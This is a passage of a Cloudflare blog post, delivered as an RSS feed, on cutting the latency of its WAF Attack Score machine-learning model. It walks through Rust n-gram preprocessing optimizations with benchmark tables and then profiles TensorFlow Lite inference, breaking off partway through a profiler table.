
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Wed, 08 Apr 2026 13:21:40 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Making WAF ML models go brrr: saving decades of processing time]]></title>
            <link>https://blog.cloudflare.com/making-waf-ai-models-go-brr/</link>
            <pubDate>Thu, 25 Jul 2024 13:00:46 GMT</pubDate>
            <description><![CDATA[ In this post, we discuss performance optimizations we've implemented for our WAF ML product. We'll guide you through code examples, benchmarks, and we'll share the impressive latency reduction numbers ]]></description>
            <content:encoded><![CDATA[ <p>We made our WAF Machine Learning models <b>5.5x</b> faster, reducing execution time by approximately <b>82%</b>, from <b>1519</b> to <b>275</b> microseconds! Read on to find out how we achieved this remarkable improvement.</p><p><a href="https://developers.cloudflare.com/waf/about/waf-attack-score/">WAF Attack Score</a> is Cloudflare's machine learning (ML)-powered layer built on top of our <a href="https://developers.cloudflare.com/waf/">Web Application Firewall (WAF)</a>. Its goal is to complement the WAF and detect attack bypasses that we haven't encountered before. This has proven invaluable in <a href="/detecting-zero-days-before-zero-day">catching zero-day vulnerabilities</a>, like the one detected in <a href="/how-cloudflares-ai-waf-proactively-detected-ivanti-connect-secure-critical-zero-day-vulnerability">Ivanti Connect Secure</a>, before they are publicly disclosed and enhancing our customers' protection against emerging and unknown threats.</p><p>Since its <a href="/waf-ml">launch in 2022</a>, WAF attack score adoption has grown exponentially, now protecting millions of Internet properties and running real-time inference on tens of millions of requests per second. The feature's popularity has driven us to seek performance improvements, enabling even broader customer use and enhancing Internet security.</p><p>In this post, we will discuss the performance optimizations we've implemented for our WAF ML product. We'll guide you through specific code examples and benchmark numbers, demonstrating how these enhancements have significantly improved our system's efficiency. Additionally, we'll share the impressive latency reduction numbers observed after the rollout.</p><p>Before diving into the optimizations, let's take a moment to review the inner workings of the WAF Attack Score, which powers our WAF ML product.</p>
    <div>
      <h2>WAF Attack Score system design</h2>
      <a href="#waf-attack-score-system-design">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Bis9LE38A3aK4k7HEn7k9/44ae7b31096471a5256961715f8c7991/unnamed--4--6.png" />
            
            </figure><p>Cloudflare's WAF attack score identifies various traffic types and attack vectors (<a href="https://www.cloudflare.com/learning/security/threats/how-to-prevent-sql-injection/">SQLi</a>, <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">XSS</a>, Command Injection, etc.) based on structural or statistical content properties. Here's how it works during inference:</p><ol><li><p><b>HTTP Request Content</b>: Start with raw HTTP input.</p></li><li><p><b>Normalization &amp; Transformation</b>: Standardize and clean the data, applying normalization, content substitutions, and de-duplication.</p></li><li><p><b>Feature Extraction</b>: Tokenize the transformed content to generate statistical and structural data.</p></li><li><p><b>Machine Learning Model Inference</b>: Analyze the extracted features with pre-trained models, mapping content representations to classes (e.g., XSS, SQLi or <a href="https://www.cloudflare.com/learning/security/what-is-remote-code-execution/">RCE</a>) or scores.</p></li><li><p><b>Classification Output in WAF</b>: Assign a score to the input, ranging from 1 (likely malicious) to 99 (likely clean), guiding security actions.</p></li></ol>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ZzHRYXU27VYB5F3F3QjXf/9e5248610a1e89ac8c73a446925abb69/cfce15fb-ce84-4489-a05a-6872b9e502b8.png" />
            
            </figure><p>Next, we will explore feature extraction and inference optimizations.</p>
    <div>
      <h2>Feature extraction optimizations</h2>
      <a href="#feature-extraction-optimizations">
        
      </a>
    </div>
    <p>In the context of the WAF Attack Score ML model, feature extraction or pre-processing is essentially a process of tokenizing the given input and producing a float tensor of 1 x m size:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7DIxHJ5zLkdeknndiNGbk0/e802888a2212ddfcae688f1c4201587f/8cc41311-3a09-4c39-b47c-9dc449760ee2.png" />
            
            </figure><p>In our initial pre-processing implementation, this is achieved via a sliding window of 3 bytes over the input with the help of Rust’s <a href="https://doc.rust-lang.org/std/collections/struct.HashMap.html">std::collections::HashMap</a> to look up the tensor index for a given ngram.</p>
    <div>
      <h3>Initial benchmarks</h3>
      <a href="#initial-benchmarks">
        
      </a>
    </div>
    <p>To establish performance baselines, we've set up four benchmark cases representing example inputs of various lengths, ranging from 44 to 9482 bytes. Each case exemplifies typical input sizes, including those for a request body, user agent, and URI. We run benchmarks using the <a href="https://bheisler.github.io/criterion.rs/book/getting_started.html">Criterion.rs</a> statistics-driven micro-benchmarking tool:</p>
            <pre><code>RUSTFLAGS="-C opt-level=3 -C target-cpu=native" cargo criterion</code></pre>
            <p>Here are initial numbers for these benchmarks executed on a Linux laptop with a 13th Gen Intel® Core™ i7-13800H processor:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Pre-processing time, μs</span></th>
    <th><span>Throughput, MiB/s</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td><span>36.40</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td><span>33.83</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>28.94</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>30.24</span></td>
  </tr>
</tbody></table><p>An important observation from these results is that pre-processing time correlates with the length of the input string, with throughput ranging from 28 MiB/s to 36 MiB/s. This suggests that considerable time is spent iterating over longer input strings. Optimizing this part of the process could significantly enhance performance. The dependency of processing time on input size highlights a key area for performance optimization. To validate this, we should examine where the processing time is spent by analyzing flamegraphs created from a 100-second profiling session visualized using <a href="https://www.honeycomb.io/blog/golang-observability-using-the-new-pprof-web-ui-to-debug-memory-usage">pprof</a>:</p>
            <pre><code>RUSTFLAGS="-C opt-level=3 -C target-cpu=native" cargo criterion -- --profile-time 100
 
go tool pprof -http=: target/criterion/profile/preprocessing/avg-body-1000/profile.pb</code></pre>
            
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/WGhFT3j6vn4QGFOmdyNGO/8dd1c6e4d171cd2c407af7bf4d9a9ac7/unnamed--5--6.png" />
            
            </figure><p>Looking at the pre-processing flamegraph above, it's clear that most of the time was spent on the following two operations:</p>
<table><thead>
  <tr>
    <th><span>Function name</span></th>
    <th><span>% Time spent</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>std::collections::hash::map::HashMap&lt;K,V,S&gt;::get</span></td>
    <td><span>61.8%</span></td>
  </tr>
  <tr>
    <td><span>regex::regex::bytes::Regex::replace_all</span></td>
    <td><span>18.5%</span></td>
  </tr>
</tbody></table><p>Let's tackle the HashMap lookups first. Lookups are happening inside the <i>tensor_populate_ngrams</i> function, where input is split into windows of 3 bytes representing ngram and then lookup inside two hash maps:</p>
            <pre><code>fn tensor_populate_ngrams(tensor: &amp;mut [f32], input: &amp;[u8]) {   
   // Populate the NORM ngrams
   let mut unknown_norm_ngrams = 0;
   let norm_offset = 1;
 
   for s in input.windows(3) {
       match NORM_VOCAB.get(s) {
           Some(pos) =&gt; {
               tensor[*pos as usize + norm_offset] += 1.0f32;
           }
           None =&gt; {
               unknown_norm_ngrams += 1;
           }
       };
   }
 
   // Populate the SIG ngrams
   let mut unknown_sig_ngrams = 0;
   let sig_offset = norm_offset + NORM_VOCAB.len();
 
   let res = SIG_REGEX.replace_all(&amp;input, b"#");
 
   for s in res.windows(3) {
       match SIG_VOCAB.get(s) {
           Some(pos) =&gt; {
               // adding +1 here as the first position will be the unknown_sig_ngrams
               tensor[*pos as usize + sig_offset + 1] += 1.0f32;
           }
           None =&gt; {
               unknown_sig_ngrams += 1;
           }
       }
   }
}</code></pre>
            <p>So essentially the pre-processing function performs a ton of hash map lookups, the volume of which depends on the size of the input string, e.g. 1469 lookups for the given benchmark case <i>avg-body-1000</i>.</p>
    <div>
      <h3>Optimization attempt #1: HashMap → Aho-Corasick</h3>
      <a href="#optimization-attempt-1-hashmap-aho-corasick">
        
      </a>
    </div>
    <p>Rust hash maps are generally quite fast. However, when that many lookups are being performed, it's not very cache friendly.</p><p>So can we do better than hash maps, and what should we try first? The answer is the <a href="https://docs.rs/aho-corasick/latest/aho_corasick/">Aho-Corasick library</a>.</p><p>This library provides multiple pattern search principally through an implementation of the <a href="https://en.wikipedia.org/wiki/Aho%E2%80%93Corasick_algorithm">Aho-Corasick algorithm</a>, which builds a fast finite state machine for executing searches in linear time.</p><p>We can also tune Aho-Corasick settings based on this recommendation:</p><blockquote><p><i>“You might want to use</i> <a href="https://docs.rs/aho-corasick/1.1.3/aho_corasick/struct.AhoCorasickBuilder.html#method.kind"><i>AhoCorasickBuilder::kind</i></a> <i>to set your searcher to always use</i> <a href="https://docs.rs/aho-corasick/1.1.3/aho_corasick/enum.AhoCorasickKind.html#variant.DFA"><i>AhoCorasickKind::DFA</i></a> <i>if search speed is critical and memory usage isn’t a concern.”</i></p></blockquote>
            <pre><code>static ref NORM_VOCAB_AC: AhoCorasick = AhoCorasick::builder().kind(Some(AhoCorasickKind::DFA)).build(&amp;[    
    "abc",
    "def",
    "wuq",
    "ijf",
    "iru",
    "piw",
    "mjw",
    "isn",
    "od ",
    "pro",
    ...
]).unwrap();</code></pre>
            <p>Then we use the constructed AhoCorasick dictionary to lookup ngrams using its <a href="https://docs.rs/aho-corasick/latest/aho_corasick/struct.AhoCorasick.html#method.find_overlapping_iter">find_overlapping_iter</a> method:</p>
            <pre><code>for mat in NORM_VOCAB_AC.find_overlapping_iter(&amp;input) {
    tensor_input_data[mat.pattern().as_usize() + 1] += 1.0;
}</code></pre>
            <p>We ran benchmarks and compared them against the baseline times shown above:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Aho-Corasick time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td><span>129.59</span></td>
    <td><span>-47.84% or 1.64x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td>	<span>16.47</span></td>
    <td><span>-41.56% or 1.71x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>1.01</span></td>
    <td><span>-30.38% or 1.44x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>1.90</span></td>
    <td><span>-33.60% or 1.51x</span></td>
  </tr>
</tbody></table><p>That's substantially better – Aho-Corasick DFA does wonders.</p>
    <div>
      <h3>Optimization attempt #2: Aho-Corasick → match</h3>
      <a href="#optimization-attempt-2-aho-corasick-match">
        
      </a>
    </div>
    <p>One would think optimization with Aho-Corasick DFA is enough and that it seems unlikely that anything else can beat it. Yet, we can throw Aho-Corasick away and simply use the Rust match statement and let the compiler do the optimization for us!</p>
            <pre><code>#[inline]
const fn norm_vocab_lookup(ngram: &amp;[u8; 3]) -&gt; usize {     
    match ngram {
        b"abc" =&gt; 1,
        b"def" =&gt; 2,
        b"wuq" =&gt; 3,
        b"ijf" =&gt; 4,
        b"iru" =&gt; 5,
        b"piw" =&gt; 6,
        b"mjw" =&gt; 7,
        b"isn" =&gt; 8,
        b"od " =&gt; 9,
        b"pro" =&gt; 10,
        ...
        _ =&gt; 0,
    }
}```</code></pre>
            <p>Here's how it performs in practice, based on the assembly generated by the <a href="https://godbolt.org/z/dqTq5n5Y3">Godbolt compiler explorer</a>. The corresponding assembly code efficiently implements this lookup by employing a jump table and byte-wise comparisons to determine the return value based on input sequences, optimizing for quick decisions and minimal branching. Although the example only includes ten ngrams, it's important to note that in applications like our WAF Attack Score ML models, we deal with thousands of ngrams. This simple match-based approach outshines both HashMap lookups and the Aho-Corasick method.</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Match time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td>	<span>112.96</span></td>
    <td><span>-54.54% or 2.20x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td>	<span>13.12</span></td>
    <td><span>-53.45% or 2.15x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>0.75</span></td>
    <td><span>-48.37% or 1.94x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>1.4076</span></td>
    <td><span>-50.91% or 2.04x</span></td>
  </tr>
</tbody></table><p>Switching to match gave us another 7-18% drop in latency, depending on the case.</p>
    <div>
      <h3>Optimization attempt #3: Regex → WindowedReplacer</h3>
      <a href="#optimization-attempt-3-regex-windowedreplacer">
        
      </a>
    </div>
    <p>So, what exactly is the purpose of <i>Regex::replace_all</i> in pre-processing? Regex is defined and used like this:</p>
            <pre><code>pub static SIG_REGEX: Lazy&lt;Regex&gt; =
    Lazy::new(|| RegexBuilder::new("[a-z]+").unicode(false).build().unwrap());
    ... 
    let res = SIG_REGEX.replace_all(&amp;input, b"#");
    for s in res.windows(3) {
        tensor[sig_vocab_lookup(s.try_into().unwrap())] += 1.0;
    }</code></pre>
            <p>Essentially, all we need is to:</p><ol><li><p>Replace every sequence of lowercase letters in the input with a single byte "#".</p></li><li><p>Iterate over replaced bytes in a windowed fashion with a step of 3 bytes representing an ngram.</p></li><li><p>Look up the ngram index and increment it in the tensor.</p></li></ol><p>This logic seems simple enough that we could implement it more efficiently with a single pass over the input and without any allocations:</p>
            <pre><code>type Window = [u8; 3];
type Iter&lt;'a&gt; = Peekable&lt;std::slice::Iter&lt;'a, u8&gt;&gt;;

pub struct WindowedReplacer&lt;'a&gt; {
    window: Window,
    input_iter: Iter&lt;'a&gt;,
}

#[inline]
fn is_replaceable(byte: u8) -&gt; bool {
    matches!(byte, b'a'..=b'z')
}

#[inline]
fn next_byte(iter: &amp;mut Iter) -&gt; Option&lt;u8&gt; {
    let byte = iter.next().copied()?;
    if is_replaceable(byte) {
        while iter.next_if(|b| is_replaceable(**b)).is_some() {}
        Some(b'#')
    } else {
        Some(byte)
    }
}

impl&lt;'a&gt; WindowedReplacer&lt;'a&gt; {
    pub fn new(input: &amp;'a [u8]) -&gt; Option&lt;Self&gt; {
        let mut window: Window = Default::default();
        let mut iter = input.iter().peekable();
        for byte in window.iter_mut().skip(1) {
            *byte = next_byte(&amp;mut iter)?;
        }
        Some(WindowedReplacer {
            window,
            input_iter: iter,
        })
    }
}

impl&lt;'a&gt; Iterator for WindowedReplacer&lt;'a&gt; {
    type Item = Window;

    #[inline]
    fn next(&amp;mut self) -&gt; Option&lt;Self::Item&gt; {
        for i in 0..2 {
            self.window[i] = self.window[i + 1];
        }
        let byte = next_byte(&amp;mut self.input_iter)?;
        self.window[2] = byte;
        Some(self.window)
    }
}</code></pre>
            <p>By utilizing the <i>WindowedReplacer</i>, we simplify the replacement logic:</p>
            <pre><code>if let Some(replacer) = WindowedReplacer::new(&amp;input) {                
    for ngram in replacer.windows(3) {
        tensor[sig_vocab_lookup(ngram.try_into().unwrap())] += 1.0;
    }
}</code></pre>
            <p>This new approach not only eliminates the need for allocating additional buffers to store replaced content, but also leverages Rust's iterator optimizations, which the compiler can more effectively optimize. You can view an example of the assembly output for this new iterator at the provided <a href="https://godbolt.org/z/fjaoP7z6Y">Godbolt link</a>.</p><p>Now let's benchmark this and compare against the original implementation:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Match time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td>	<span>51.00</span></td>
    <td><span>-79.47% or 4.87x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td>	<span>5.53</span></td>
    <td><span>-80.36% or 5.09x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td><span>0.40</span></td>
    <td><span>-72.11% or 3.59x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td><span>0.69</span></td>
    <td><span>-76.07% or 4.18x</span></td>
  </tr>
</tbody></table><p>The new letters replacement implementation has doubled the preprocessing speed compared to the previously optimized version using match statements, and it is four to five times faster than the original version!</p>
    <div>
      <h3>Optimization attempt #4: Going nuclear with branchless ngram lookups</h3>
      <a href="#optimization-attempt-4-going-nuclear-with-branchless-ngram-lookups">
        
      </a>
    </div>
    <p>At this point, 4-5x improvement might seem like a lot and there is no point pursuing any further optimizations. After all, using an ngram lookup with a match statement has beaten the following methods, with benchmarks omitted for brevity:</p>
<table><thead>
  <tr>
    <th><span>Lookup method</span></th>
    <th><span>Description</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><a href="https://doc.rust-lang.org/std/collections/struct.HashMap.html"><span>std::collections::HashMap</span></a></td>
    <td><span>Uses </span><a href="https://github.com/rust-lang/hashbrown"><span>Google’s SwissTable</span></a><span> design with SIMD lookups to scan multiple hash entries in parallel. </span></td>
  </tr>
  <tr>
    <td><a href="https://docs.rs/aho-corasick/latest/aho_corasick/#"><span>Aho-Corasick</span></a><span> matcher with and without </span><a href="https://docs.rs/aho-corasick/latest/aho_corasick/dfa/struct.DFA.html"><span>DFA</span></a></td>
    <td><span>Also utilizes SIMD instructions in some cases.</span></td>
  </tr>
  <tr>
    <td><a href="https://crates.io/crates/phf"><span>phf crate</span></a><span> </span></td>
    <td><span>A library to generate efficient lookup tables at compile time using </span><a href="https://en.wikipedia.org/wiki/Perfect_hash_function"><span>perfect hash functions</span></a><span>.</span></td>
  </tr>
  <tr>
    <td><a href="https://crates.io/crates/ph"><span>ph crate</span></a></td>
    <td><span>Another Rust library of data structures based on perfect hashing. </span></td>
  </tr>
  <tr>
    <td><a href="https://crates.io/crates/quickphf"><span>quickphf crate</span></a></td>
    <td><span>A Rust crate that allows you to use static compile-time generated hash maps and hash sets using </span><a href="https://arxiv.org/abs/2104.10402"><span>PTHash perfect hash functions</span></a><span>.</span></td>
  </tr>
</tbody></table><p>However, if we look again at <a href="https://godbolt.org/z/dqTq5n5Y3">the assembly of the norm_vocab_lookup function</a>, it is clear that the execution flow has to perform a bunch of comparisons using <i>cmp</i> instructions. This creates many branches for the CPU to handle, which can lead to branch mispredictions. Branch mispredictions occur when the CPU incorrectly guesses the path of execution, causing delays as it discards partially completed instructions and fetches the correct ones. By reducing or eliminating these branches, we can avoid these mispredictions and improve the efficiency of the lookup process. How can we get rid of those branches when there is a need to look up thousands of unique ngrams?</p><p>Since there are only 3 bytes in each ngram, we can build two lookup tables of 256 x 256 x 256 size, storing the ngram tensor index. With this naive approach, our memory requirements will be: 256 x 256 x 256 x 2 x 2 = 64 MB, which seems like a lot.</p><p>However, given that we only care about ASCII bytes 0..127, then memory requirements can be lower: 128 x 128 x 128 x 2 x 2 = 8 MB, which is better. However, we will need to check for bytes &gt;= 128, which will introduce a branch again.</p><p>So can we do better? Considering that the actual number of distinct byte values used in the ngrams is significantly less than the total possible 256 values, we can reduce memory requirements further by employing the following technique:</p><p>1. To avoid the branching caused by comparisons, we use precomputed offset lookup tables. This means instead of comparing each byte of the ngram during each lookup, we precompute the positions of each possible byte in a lookup table. This way, we replace the comparison operations with direct memory accesses, which are much faster and do not involve branching. We build an ngram bytes offsets lookup const array, storing each unique ngram byte offset position multiplied by the number of unique ngram bytes:</p>
            <pre><code>const NGRAM_OFFSETS: [[u32; 256]; 3] = [
    [
        // offsets of first byte in ngram
    ],
    [
        // offsets of second byte in ngram
    ],
    [
        // offsets of third byte in ngram
    ],
];</code></pre>
            <p>2. Then to obtain the ngram index, we can use this simple const function:</p>
            <pre><code>#[inline]
const fn ngram_index(ngram: [u8; 3]) -&gt; usize {
    (NGRAM_OFFSETS[0][ngram[0] as usize]
        + NGRAM_OFFSETS[1][ngram[1] as usize]
        + NGRAM_OFFSETS[2][ngram[2] as usize]) as usize
}</code></pre>
            <p>3. To look up the tensor index based on the ngram index, we construct another const array at compile time using a list of all ngrams, where N is the number of unique ngram bytes:</p>
            <pre><code>const NGRAM_TENSOR_IDX: [u16; N * N * N] = {
    let mut arr = [0; N * N * N];
    arr[ngram_index(*b"abc")] = 1;
    arr[ngram_index(*b"def")] = 2;
    arr[ngram_index(*b"wuq")] = 3;
    arr[ngram_index(*b"ijf")] = 4;
    arr[ngram_index(*b"iru")] = 5;
    arr[ngram_index(*b"piw")] = 6;
    arr[ngram_index(*b"mjw")] = 7;
    arr[ngram_index(*b"isn")] = 8;
    arr[ngram_index(*b"od ")] = 9;
    ...
    arr
};</code></pre>
            <p>4. Finally, to update the tensor based on given ngram, we lookup the ngram index, then the tensor index, and then increment it with help of <a href="https://doc.rust-lang.org/std/primitive.slice.html#method.get_unchecked_mut">get_unchecked_mut</a>, which avoids unnecessary (in this case) boundary checks and eliminates another source of branching:</p>
            <pre><code>#[inline]
fn update_tensor_with_ngram(tensor: &amp;mut [f32], ngram: [u8; 3]) {
    let ngram_idx = ngram_index(ngram);
    debug_assert!(ngram_idx &lt; NGRAM_TENSOR_IDX.len());
    unsafe {
        let tensor_idx = *NGRAM_TENSOR_IDX.get_unchecked(ngram_idx) as usize;
        debug_assert!(tensor_idx &lt; tensor.len());
        *tensor.get_unchecked_mut(tensor_idx) += 1.0;
    }
}</code></pre>
            <p>This logic works effectively, passes correctness tests, and most importantly, it's completely branchless! Moreover, the memory footprint of used lookup arrays is tiny – just ~500 KiB of memory – which easily fits into modern CPU L2/L3 caches, ensuring that expensive cache misses are rare and performance is optimal.</p><p>The last trick we will employ is loop unrolling for ngrams processing. By taking 6 ngrams (corresponding to 8 bytes of the input array) at a time, the compiler can unroll the second loop and auto-vectorize it, leveraging parallel execution to improve performance:</p>
            <pre><code>const CHUNK_SIZE: usize = 6;

let chunks_max_offset =
    ((input.len().saturating_sub(2)) / CHUNK_SIZE) * CHUNK_SIZE;
for i in (0..chunks_max_offset).step_by(CHUNK_SIZE) {
    for ngram in input[i..i + CHUNK_SIZE + 2].windows(3) {
        update_tensor_with_ngram(tensor, ngram.try_into().unwrap());
    }
}</code></pre>
            <p>Tying up everything together, our final pre-processing benchmarks show the following:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Baseline time, μs</span></th>
    <th><span>Branchless time, μs</span></th>
    <th><span>Optimization</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>preprocessing/long-body-9482</span></td>
    <td><span>248.46</span></td>
    <td><span>21.53</span></td>
    <td><span>-91.33% or 11.54x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-body-1000</span></td>
    <td><span>28.19</span></td>
    <td><span>2.33</span></td>
    <td><span>-91.73% or 12.09x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-url-44</span></td>
    <td><span>1.45</span></td>
    <td>	<span>0.26</span></td>
    <td><span>-82.34% or 5.66x</span></td>
  </tr>
  <tr>
    <td><span>preprocessing/avg-ua-91</span></td>
    <td><span>2.87</span></td>
    <td>	<span>0.43</span></td>
    <td><span>-84.92% or 6.63x</span></td>
  </tr>
</tbody></table><p>The longer input is, the higher the latency drop will be due to branchless ngram lookups and loop unrolling, ranging from <b>six to twelve times faster</b> than baseline implementation.</p><p>After trying various optimizations, the final version of pre-processing retains optimization attempts 3 and 4, using branchless ngram lookup with offset tables and a single-pass non-allocating replacement iterator.</p><p>There are potentially more CPU cycles left on the table, and techniques like memory pre-fetching and manual SIMD intrinsics could speed this up a bit further. However, let's now switch gears into looking at inference latency a bit closer.</p>
    <div>
      <h2>Model inference optimizations</h2>
      <a href="#model-inference-optimizations">
        
      </a>
    </div>
    
    <div>
      <h3>Initial benchmarks</h3>
      <a href="#initial-benchmarks">
        
      </a>
    </div>
    <p>Let’s have a look at original performance numbers of the WAF Attack Score ML model, which uses <a href="https://github.com/tensorflow/tensorflow/releases/tag/v2.6.0">TensorFlow Lite 2.6.0</a>:</p>
<table><thead>
  <tr>
    <th><span>Benchmark case</span></th>
    <th><span>Inference time, μs</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>inference/long-body-9482</span></td>
    <td><span>247.31</span></td>
  </tr>
  <tr>
    <td><span>inference/avg-body-1000</span></td>
    <td><span>246.31</span></td>
  </tr>
  <tr>
    <td><span>inference/avg-url-44</span></td>
    <td><span>246.40</span></td>
  </tr>
  <tr>
    <td><span>inference/avg-ua-91</span></td>
    <td><span>246.88</span></td>
  </tr>
</tbody></table><p>Model inference is actually independent of the original input length, as inputs are transformed into tensors of predetermined size during the pre-processing phase, which we optimized above. From now on, we will refer to a singular inference time when benchmarking our optimizations.</p><p>Digging deeper with profiler, we observed that most of the time is spent on the following operations:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3uy64gatRk8PfdnpRz5Xm5/0d3da469c30e5941524289c1b13574c5/unnamed--6--6.png" />
            
            </figure>
<table><thead>
  <tr>
    <th><span>Function name</span></th>
    <th><span>% Time spent</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>tflite::tensor_utils::PortableMatrixBatchVectorMultiplyAccumulate</span></td>
    <td><span>42.46%</span></td>
  </tr>
  <tr>
    <td><span>tflite::tensor_utils::PortableAsymmetricQuantizeFloats</span></td>
    <td><span>30.59%</span></td>
  </tr>
  <tr>
    <td><span>tflite::optimized_ops::SoftmaxImpl</span></td>
    <td><span>12.02%</span></td>
  </tr>
  <tr>
    <td><span>tflite::reference_ops::MaximumMinimumBroadcastSlow</span></td>
    <td><span>5.35%</span></td>
  </tr>
  <tr>
    <td><span>tflite::ops::builtin::elementwise::LogEval</span></td>
    <td><span>4.13%</span></td>
  </tr>
</tbody></table><p>The most expensive operation is matrix multiplication, which boils down to iteration within <a href="https://github.com/tensorflow/tensorflow/blob/v2.6.0/tensorflow/lite/kernels/internal/reference/portable_tensor_utils.cc#L119-L136">three nested loops</a>:</p>
            <pre><code>void PortableMatrixBatchVectorMultiplyAccumulate(const float* matrix,
                                                 int m_rows, int m_cols,
                                                 const float* vector,
                                                 int n_batch, float* result) {
  float* result_in_batch = result;
  for (int b = 0; b &lt; n_batch; b++) {
    const float* matrix_ptr = matrix;
    for (int r = 0; r &lt; m_rows; r++) {
      float dot_prod = 0.0f;
      const float* vector_in_batch = vector + b * m_cols;
      for (int c = 0; c &lt; m_cols; c++) {
        dot_prod += *matrix_ptr++ * *vector_in_batch++;
      }
      *result_in_batch += dot_prod;
     ++result_in_batch;
    }
  }
}</code></pre>
            <p>This doesn’t look very efficient and many <a href="https://en.algorithmica.org/hpc/algorithms/matmul/">blogs</a> and <a href="https://www.cs.utexas.edu/~flame/pubs/GotoTOMS_revision.pdf">research papers</a> have been written on how matrix multiplication can be optimized, which basically boils down to:</p><ul><li><p><b>Blocking</b>: Divide matrices into smaller blocks that fit into the cache, improving cache reuse and reducing memory access latency.</p></li><li><p><b>Vectorization</b>: Use SIMD instructions to process multiple data points in parallel, enhancing efficiency with vector registers.</p></li><li><p><b>Loop Unrolling</b>: Reduce loop control overhead and increase parallelism by executing multiple loop iterations simultaneously.</p></li></ul><p>To gain a better understanding of how these techniques work, we recommend watching this video, which brilliantly depicts the process of matrix multiplication:</p>
<p></p>
    <div>
      <h3>Tensorflow Lite with AVX2</h3>
      <a href="#tensorflow-lite-with-avx2">
        
      </a>
    </div>
    <p>TensorFlow Lite does, in fact, support SIMD matrix multiplication – we just need to enable it and re-compile the TensorFlow Lite library:</p>
            <pre><code>if [[ "$(uname -m)" == x86_64* ]]; then
    # On x86_64 target x86-64-v3 CPU to enable AVX2 and FMA.
    arguments+=("--copt=-march=x86-64-v3")
fi</code></pre>
            <p>After running profiler again using the SIMD-optimized TensorFlow Lite library:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6NmJhJoYG42ZZhU41m0Uj5/1d9fce45d44f98b41375d6a56f1a7cac/unnamed--7--5.png" />
            
            </figure><p>Top operations as per profiler output:</p>
<table><thead>
  <tr>
    <th><span>Function name</span></th>
    <th><span>% Time spent</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>tflite::tensor_utils::SseMatrixBatchVectorMultiplyAccumulateImpl</span></td>
    <td><span>43.01%</span></td>
  </tr>
  <tr>
    <td><span>tflite::tensor_utils::NeonAsymmetricQuantizeFloats</span></td>
    <td><span>22.46%</span></td>
  </tr>
  <tr>
    <td><span>tflite::reference_ops::MaximumMinimumBroadcastSlow</span></td>
